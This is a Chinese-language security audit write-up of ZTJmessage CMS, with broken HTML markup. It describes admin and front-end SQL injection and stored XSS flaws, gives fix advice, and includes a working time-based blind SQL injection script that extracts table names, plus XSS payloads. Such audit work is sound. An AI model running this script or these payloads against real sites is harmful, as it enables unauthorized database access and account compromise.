ZTJmessage CMS 代码审计深度分析<\/h1>

0x01 审计准备<\/h2>

工具与环境<\/h3>

审计工具<\/strong>：Seay源码审计工具<\/li>

审计原则<\/strong>：从配置文件入手，逐步分析入口文件和核心功能<\/li> <\/ul>
框架基础分析<\/h3>

核心配置文件<\/strong>：<\/p>

定义了基本类结构<\/li>
载入了输入库文件和所有控制器类<\/li>
实例化了两个关键类：

adminlogin<\/code> 类<\/li>
userrequest<\/code> 类<\/li> <\/ul> <\/li> <\/ul> <\/li>
安全函数分析<\/strong> (safety.fun.php<\/code>)：<\/p> SQL注入防护<\/strong>：先进行去除斜杠处理<\/li> 对非数字输入自动加引号<\/li> <\/ul> <\/li> XSS防护<\/strong>：直接进行本地测试验证<\/li> <\/ul> <\/li> 整数判断与SQL过滤<\/strong>：检查输入是否在预定义的 $string_var<\/code> 中<\/li> 包含单引号等特殊字符时返回 false<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 0x02 漏洞分析<\/h2> 1. 后台SQL注入漏洞<\/h3> 漏洞位置<\/strong>：admin\/index.php<\/code><\/p> 利用条件<\/strong>：<\/p> 需要管理员权限<\/li> 访问 edituser<\/code> 功能点<\/li> <\/ul> 漏洞成因<\/strong>：<\/p> 包含 common.php<\/code> 文件并实例化 AdminControl<\/code> 类<\/li> 执行流程：判断传入的 location<\/code> 参数<\/li> 调用 menu<\/code> 方法获取用户权限<\/li> 包含 \/admin\/edituser.Menu.php<\/code><\/li> <\/ul> <\/li> 关键问题： id<\/code> 参数未经任何过滤直接传入 sel<\/code> 方法<\/li> sel<\/code> 方法未对输入进行过滤<\/li> <\/ul> <\/li> <\/ol> 利用方式<\/strong>：时间盲注<\/p> 利用脚本<\/strong>：<\/p> import<\/span> requests <\/span><\/span>import<\/span> time <\/span><\/span> <\/span><\/span>url =<\/span> "http:\/\/127.0.0.1\/ZTJmessage\/admin\/index.php?location=edituser&id="<\/span> <\/span><\/span>header =<\/span> { <\/span><\/span> "User-Agent"<\/span>: "Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko\/20100101 Firefox\/95.0"<\/span>, <\/span><\/span> "Cookie"<\/span>: "PHPSESSID=eke4v1b953niu1gdf9e5hr5gq4"<\/span> <\/span><\/span>} <\/span><\/span> <\/span><\/span>i =<\/span> 0<\/span> <\/span><\/span>flag =<\/span> ''<\/span> <\/span><\/span>while<\/span> True<\/span>: <\/span><\/span> i =<\/span> i+<\/span>1<\/span> <\/span><\/span> head =<\/span> 32<\/span> <\/span><\/span> tail =<\/span> 128<\/span> <\/span><\/span> while<\/span> head <<\/span> tail: <\/span><\/span> mid =<\/span> (head+<\/span>tail)\/<\/span>2<\/span> <\/span><\/span> # 获取数据库名<\/span> <\/span><\/span> # payload = "-1' or if(ascii(substr((database()),{0},1))>{1},sleep(1.5),0)--+".format(i,mid)<\/span> <\/span><\/span> # 获取表名<\/span> <\/span><\/span> payload =<\/span> "-1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),<\/span>{0}<\/span>,1))><\/span>{1}<\/span>,sleep(1.5),0)--+"<\/span>.<\/span>format(i,mid) <\/span><\/span> url1 =<\/span> url+<\/span>payload <\/span><\/span> print(url1) <\/span><\/span> times =<\/span> time.<\/span>time() <\/span><\/span> re =<\/span> requests.<\/span>get(url1, headers=<\/span>header) <\/span><\/span> timee =<\/span> time.<\/span>time() <\/span><\/span> if<\/span> timee-<\/span>times ><\/span> 2<\/span>: <\/span><\/span> head =<\/span> mid+<\/span>1<\/span> <\/span><\/span> else<\/span>: <\/span><\/span> tail =<\/span> mid <\/span><\/span> if<\/span>(head !=<\/span> 32<\/span>): <\/span><\/span> flag +=<\/span> chr(head) <\/span><\/span> print(flag) <\/span><\/span> else<\/span>: <\/span><\/span> break<\/span> <\/span><\/span><\/code><\/pre>2. 存储型XSS漏洞<\/h3> 漏洞位置<\/strong>：upsiteinfo<\/code> 功能<\/p> 利用流程<\/strong>：<\/p> 访问后台站点信息设置<\/li> 在统计代码 (stat_code<\/code>) 字段插入XSS payload<\/li> 漏洞成因：输入仅经过 toUTF-8<\/code> 和 addslanshes_d<\/code> 方法处理<\/li> addslanshes_d<\/code> 仅进行转义，未过滤XSS标签<\/li> <\/ul> <\/li> <\/ol> 验证方法<\/strong>：插入经典XSS语句：<script>alert(1)<\/script><\/code> 前端查看是否成功弹窗<\/p> 3. 前台留言板SQL注入<\/h3> 漏洞位置<\/strong>：留言回复功能<\/p> 利用条件<\/strong>：<\/p> 需要前台留言板操作权限<\/li> 利用 reply<\/code> 功能<\/li> <\/ul> 漏洞成因<\/strong>：<\/p> 控制器 replyAction.class.php<\/code> 处理用户输入<\/li> ReplyContent<\/code> 字段仅经过： ToUtf8<\/code> 编码转换<\/li> checkok<\/code> 方法（实际未进行有效检查）<\/li> <\/ul> <\/li> 直接使用 update<\/code> 方法执行SQL查询<\/li> <\/ol> 利用方式<\/strong>：<\/p> 使用Burp Suite拦截留言回复请求<\/li> 修改 ReplyContent<\/code> 参数为注入语句<\/li> 注意需要从返回包中获取 Replyinputkey<\/code> 用于后续请求<\/li> <\/ol> 4. 前台公告XSS漏洞<\/h3> 漏洞位置<\/strong>：百度富文本编辑器<\/p> 利用方法<\/strong>：<\/p> 通过抓包工具删除富文本中的 p<\/code> 标签<\/li> 插入XSS payload实现绕过<\/li> <\/ol> 验证方法<\/strong>：插入XSS代码后查看是否成功弹窗<\/p> 0x03 防护建议<\/h2> 输入过滤<\/strong>：<\/p> 对所有用户输入进行严格过滤<\/li> 使用预编译语句防止SQL注入<\/li> 实现全面的XSS过滤函数<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 加强后台权限验证<\/li> 实现最小权限原则<\/li> <\/ul> <\/li> 安全函数改进<\/strong>：<\/p> 完善 checkok<\/code> 方法的实际检查功能<\/li> 在 addslanshes_d<\/code> 方法中加入XSS过滤<\/li> <\/ul> <\/li> 富文本编辑器<\/strong>：<\/p> 更新到最新版本<\/li> 实现内容安全策略(CSP)<\/li> <\/ul> <\/li> <\/ol> 0x04 审计经验总结<\/h2> 审计流程<\/strong>：<\/p> 从配置文件入手<\/li> 跟踪用户输入流程<\/li> 重点检查数据库操作和输出显示<\/li> <\/ul> <\/li> 时间投入<\/strong>：<\/p> 完整审计约需1-2天时间<\/li> 需要耐心跟踪代码执行流程<\/li> <\/ul> <\/li> 学习建议<\/strong>：<\/p> 多分析已公开的CMS漏洞<\/li> 建立系统的审计方法论<\/li> 保持对新型漏洞的关注<\/li> <\/ul> <\/li> <\/ol> 通过本次审计，我们发现了ZTJmessage CMS中存在的多个安全漏洞，涵盖了SQL注入、存储型XSS等多种类型，这些漏洞的发现和修复对于提高系统安全性具有重要意义。<\/p>